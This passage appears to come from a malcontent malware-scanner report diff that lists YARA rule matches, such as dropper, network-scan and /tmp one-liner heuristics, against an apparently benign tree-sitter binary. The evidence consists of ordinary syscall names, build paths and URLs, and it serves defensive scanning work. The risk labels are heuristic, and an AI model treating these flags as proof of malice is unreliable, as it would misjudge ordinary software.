[http](https://github.com/search?q=http&type=code) | -| MEDIUM | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen) | generic listen string | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) | -| LOW | [data/encoding/json_encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/json-encode.yara#JSONEncode) | encodes JSON | [JSON.stringify](https://github.com/search?q=JSON.stringify&type=code) | -| LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | -| LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [exec/dylib/iterate](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/iterate.yara#dl_iterate_phdr) | [iterate over list of shared objects](https://man7.org/linux/man-pages/man3/dl_iterate_phdr.3.html) | [dl_iterate_phdr](https://github.com/search?q=dl_iterate_phdr&type=code) | -| LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | -| LOW | [exec/shell/SHELL](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/SHELL.yara#SHELL) | [path to active shell](https://man.openbsd.org/login.1#ENVIRONMENT) | [SHELL](https://github.com/search?q=SHELL&type=code) | -| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | -| LOW | [fs/directory/list](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-list.yara#GoReadDir) | Uses Go functions to list a directory | [.ReadDir](https://github.com/search?q=.ReadDir&type=code) | -| LOW | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#unlink) | [deletes files](https://man7.org/linux/man-pages/man2/unlink.2.html) | [unlinkat](https://github.com/search?q=unlinkat&type=code) | -| LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) | -| LOW | 
[fs/symlink_resolve](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/symlink-resolve.yara#realpath) | [resolves symbolic links](https://man7.org/linux/man-pages/man3/realpath.3.html) | [realpath](https://github.com/search?q=realpath&type=code) | -| LOW | [fs/tempdir/tempfile_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempfile-create.yara#mktemp) | Uses mktemp to create temporary files | [temp file](https://github.com/search?q=temp+file&type=code) | -| LOW | [net/dns/txt](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-txt.yara#dns_txt) | Uses DNS TXT (text) records | [TXT](https://github.com/search?q=TXT&type=code)
[dns](https://github.com/search?q=dns&type=code) | -| LOW | [net/http/2](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http2.yara#http2) | Uses the HTTP/2 protocol | [HTTP/2](https://github.com/search?q=HTTP%2F2&type=code) | -| LOW | [net/http/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http-request.yara#http_request) | makes HTTP requests | [HTTP/1.](https://github.com/search?q=HTTP%2F1.&type=code) | -| LOW | [net/resolve/hostport_parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) | -| LOW | [net/socket/local_addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) | -| LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | -| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recvmsg) | [receive a message from a socket](https://linux.die.net/man/2/recvmsg) | [recvmsg](https://github.com/search?q=recvmsg&type=code) | -| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#sendmsg) | [send a message to a socket](https://linux.die.net/man/2/sendmsg) | [sendmsg](https://github.com/search?q=sendmsg&type=code) | -| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://bitbucket.org/grammar.js.gitignore.gitattributes.editorconfigcgop](https://bitbucket.org/grammar.js.gitignore.gitattributes.editorconfigcgop)
[https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.mi](https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.mi)
[https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.c](https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.c)
[https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.j](https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.j)
[https://code.jquery.com/jquery-3.3.1.min.js](https://code.jquery.com/jquery-3.3.1.min.js)
[https://docs.rs/getrandom](https://docs.rs/getrandom)
[https://docs.rs/tree-sitter-language/](https://docs.rs/tree-sitter-language/)
[https://docs.rs/tree-sitter/](https://docs.rs/tree-sitter/)
[https://github.com/ChimeHQ/SwiftTreeSitter](https://github.com/ChimeHQ/SwiftTreeSitter)
[https://github.com/clap-rs/clap/issues/home/linuxbrew/.cache/Homebrew/car](https://github.com/clap-rs/clap/issues/home/linuxbrew/.cache/Homebrew/car)
[https://github.com/clap-rs/clap/issues=-/home/linuxbrew/.cache/Homebrew/c](https://github.com/clap-rs/clap/issues=-/home/linuxbrew/.cache/Homebrew/c)
[https://github.com/tree-sitter/tree-sitter-Failed](https://github.com/tree-sitter/tree-sitter-Failed)
[https://gitlab.com/https](https://gitlab.com/https)
[https://parser.cparser.h](https://parser.cparser.h)
[https://tree-sitter.github.io/tree-sitter.jshttps](https://tree-sitter.github.io/tree-sitter.jshttps)
[https://tree-sitter.github.io/tree-sitter.wasmhttps](https://tree-sitter.github.io/tree-sitter.wasmhttps)
[https://tree-sitter.github.io/tree-sitter/assets/images/favicon-16x16.png](https://tree-sitter.github.io/tree-sitter/assets/images/favicon-16x16.png)
[https://tree-sitter.github.io/tree-sitter/assets/images/favicon-32x32.png](https://tree-sitter.github.io/tree-sitter/assets/images/favicon-32x32.png)
[https://tree-sitter.github.io/tree-sitter/assets/js/playground.jsTREE_SIT](https://tree-sitter.github.io/tree-sitter/assets/js/playground.jsTREE_SIT)
[https://tree-sitter.github.io/tree-sitter/assets/schemas/grammar.schema.j](https://tree-sitter.github.io/tree-sitter/assets/schemas/grammar.schema.j)
[https://tree-sitter.github.io/tree-sitter/creating-parsers](https://tree-sitter.github.io/tree-sitter/creating-parsers)
[https://tree-sitter.github.io/tree-sitter/playground](https://tree-sitter.github.io/tree-sitter/playground)
[https://tree-sitter.github.io/tree-sitter/syntax-highlighting](https://tree-sitter.github.io/tree-sitter/syntax-highlighting)
[https://tree-sitter.github.io/tree-sitter/using-parsers](https://tree-sitter.github.io/tree-sitter/using-parsers) | -| LOW | [os/fd/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/write.yara#py_fd_write) | writes to a file handle | [stdout.write(output)](https://github.com/search?q=stdout.write%28output%29&type=code) | -| LOW | [process/chdir](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chdir.yara#chdir_shell) | changes working directory | [cd -u env -i](https://github.com/search?q=cd+-u++env+-i&type=code) | -| LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real and effective group ID of process | [setgid](https://github.com/search?q=setgid&type=code) | -| LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) | -| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | -| LOW | [process/thread_local_storage](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/thread_local_storage.yara#tls_get_addr) | [Uses glibc thread local storage](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) | -| LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | +| RISK | KEY | DESCRIPTION | EVIDENCE | 
+|--------|---------------------------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| HIGH | 
[exec/shell/tmp_semicolon](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/tmp_semicolon.yara#semicolon_short_tmp) | unusual one-liners involving /tmp | [--;/tmp/rust-20241004-6494-uljaw4/rustc-1](https://github.com/search?q=--%3B%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1&type=code) | +| MEDIUM | [c2/tool_transfer/dropper](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/dropper.yara#dropper) | References 'dropper' | [Dropper](https://github.com/search?q=Dropper&type=code) | +| MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code) | +| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/clap/issues/home/linuxbrew/.cache](https://github.com/search?q=%2Fclap%2Fissues%2Fhome%2Flinuxbrew%2F.cache&type=code)
[/debug/.J](https://github.com/search?q=%2Fdebug%2F.J&type=code)
[/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | +| MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | +| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execvp](https://github.com/search?q=execvp&type=code) | +| MEDIUM | [exec/shell/power](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/powershell.yara#powershell) | powershell | [powershell](https://github.com/search?q=powershell&type=code) | +| MEDIUM | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.cache/Homebrew/cargo_cache/registry/src/index.crates.](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.cache%2FHomebrew%2Fcargo_cache%2Fregistry%2Fsrc%2Findex.crates.&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/tree-sitter/0.24.2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Ftree-sitter%2F0.24.2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/lib/ld.so](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Flib%2Fld.so&type=code)
[/home/linuxbrew/.linuxbrew/opt/gcc/lib/gcc/current](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgcc%2Flib%2Fgcc%2Fcurrent&type=code) | +| MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/col](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fcol&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/raw](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fraw&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/str](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fstr&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/syn](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fsyn&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/vec](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fvec&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/cell](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fcell&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/esca](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fesca&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/io/b](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fio%2Fb&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/num/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fnum%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/ops/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fops%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/slic](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fslic&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/str/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fstr%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/time](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Ftime&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/io/mo](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fio%2Fmo&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/io/st](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fio%2Fst&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/os/fd](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fos%2Ffd&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/sync/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fsync%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/sys/p](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fsys%2Fp&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/sys/s](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fsys%2Fs&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/threa](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fthrea&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/addr2line-0.22](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Faddr2line-0.22&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/gimli-0.29.0/s](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Fgimli-0.29.0%2Fs&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/hashbrown-0.14](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Fhashbrown-0.14&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/miniz_oxide-0.](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Fminiz_oxide-0.&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/rustc-demangle](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Frustc-demangle&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/cli/config/s](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fcli%2Fconfig%2Fs&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/cli/generate](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fcli%2Fgenerate&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/cli/src/high](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fcli%2Fsrc%2Fhigh&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/highlight/sr](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fhighlight%2Fsr&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/binding_](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fbinding_&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/././](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2F.%2F&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./ge](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fge&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./la](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fla&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./pa](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fpa&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./qu](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fqu&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./st](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fst&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./su](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fsu&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./tr](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Ftr&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/tags/src/lib](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Ftags%2Fsrc%2Flib&type=code) | +| MEDIUM | [fs/proc/self_exe](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-exe.yara#proc_self_exe) | gets executable associated to this process | [/proc/self/exe](https://github.com/search?q=%2Fproc%2Fself%2Fexe&type=code) | +| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | +| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [Content-Type](https://github.com/search?q=Content-Type&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | +| MEDIUM | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen) | generic listen string | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | +| MEDIUM | [process/thread_local_storage](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/thread_local_storage.yara#tls_get_addr) | [looks up memory addresses for thread local storage or linked libraries](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) | +| MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) | +| LOW | [data/encoding/json_encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/json-encode.yara#JSONEncode) | encodes JSON | [JSON.stringify](https://github.com/search?q=JSON.stringify&type=code) | +| LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | +| LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | +| LOW | [exec/dylib/iterate](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/iterate.yara#dl_iterate_phdr) | [iterate over list of shared objects](https://man7.org/linux/man-pages/man3/dl_iterate_phdr.3.html) | [dl_iterate_phdr](https://github.com/search?q=dl_iterate_phdr&type=code) | +| LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | +| LOW | [exec/shell/SHELL](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/SHELL.yara#SHELL) | [path to active shell](https://man.openbsd.org/login.1#ENVIRONMENT) | [SHELL](https://github.com/search?q=SHELL&type=code) | +| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | +| LOW | [fs/directory/list](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-list.yara#GoReadDir) | Uses Go functions to list a directory | [.ReadDir](https://github.com/search?q=.ReadDir&type=code) | +| LOW | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#unlink) | [deletes files](https://man7.org/linux/man-pages/man2/unlink.2.html) | [unlinkat](https://github.com/search?q=unlinkat&type=code) | +| LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) | +| LOW | 
